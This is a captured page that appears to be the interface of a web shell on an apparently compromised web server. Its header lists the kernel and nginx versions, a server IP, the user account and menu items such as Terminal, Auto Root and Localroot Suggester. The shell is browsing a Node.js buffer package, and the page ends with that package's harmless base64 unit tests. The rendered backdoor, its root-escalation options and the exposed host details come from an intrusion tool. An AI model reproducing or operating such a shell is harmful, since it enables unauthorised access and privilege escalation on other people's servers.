Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.39.197
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
buffer /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
node
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
_polyfill.js
4.3
KB
-rw-r--r--
2015-09-08 13:09
base64.js
1.58
KB
-rw-r--r--
2015-09-16 06:11
basic.js
1.77
KB
-rw-r--r--
2016-08-03 20:44
compare.js
1.17
KB
-rw-r--r--
2015-09-16 06:11
constructor.js
4.31
KB
-rw-r--r--
2016-08-03 20:44
from-string.js
3.25
KB
-rw-r--r--
2015-12-01 00:13
is-buffer.js
664
B
-rw-r--r--
2016-08-03 20:44
methods.js
2.82
KB
-rw-r--r--
2016-01-13 18:54
slice.js
958
B
-rw-r--r--
2015-09-16 21:23
static.js
481
B
-rw-r--r--
2016-08-03 20:44
to-string.js
6.88
KB
-rw-r--r--
2015-09-16 06:11
write.js
3.4
KB
-rw-r--r--
2016-08-03 20:44
write_infinity.js
1.14
KB
-rw-r--r--
2016-08-03 20:44
Save
Rename
if (process.env.OBJECT_IMPL) global.TYPED_ARRAY_SUPPORT = false var B = require('../').Buffer var test = require('tape') test('base64: ignore whitespace', function (t) { var text = '\n YW9ldQ== ' var buf = new B(text, 'base64') t.equal(buf.toString(), 'aoeu') t.end() }) test('base64: strings without padding', function (t) { t.equal((new B('YW9ldQ', 'base64').toString()), 'aoeu') t.end() }) test('base64: newline in utf8 -- should not be an issue', function (t) { t.equal( new B('LS0tCnRpdGxlOiBUaHJlZSBkYXNoZXMgbWFya3MgdGhlIHNwb3QKdGFnczoK', 'base64').toString('utf8'), '---\ntitle: Three dashes marks the spot\ntags:\n' ) t.end() }) test('base64: newline in base64 -- should get stripped', function (t) { t.equal( new B('LS0tCnRpdGxlOiBUaHJlZSBkYXNoZXMgbWFya3MgdGhlIHNwb3QKdGFnczoK\nICAtIHlhbWwKICAtIGZyb250LW1hdHRlcgogIC0gZGFzaGVzCmV4cGFuZWQt', 'base64').toString('utf8'), '---\ntitle: Three dashes marks the spot\ntags:\n - yaml\n - front-matter\n - dashes\nexpaned-' ) t.end() }) test('base64: tab characters in base64 - should get stripped', function (t) { t.equal( new B('LS0tCnRpdGxlOiBUaHJlZSBkYXNoZXMgbWFya3MgdGhlIHNwb3QKdGFnczoK\t\t\t\tICAtIHlhbWwKICAtIGZyb250LW1hdHRlcgogIC0gZGFzaGVzCmV4cGFuZWQt', 'base64').toString('utf8'), '---\ntitle: Three dashes marks the spot\ntags:\n - yaml\n - front-matter\n - dashes\nexpaned-' ) t.end() }) test('base64: invalid non-alphanumeric characters -- should be stripped', function (t) { t.equal( new B('!"#$%&\'()*,.:;<=>?@[\\]^`{|}~', 'base64').toString('utf8'), '' ) t.end() })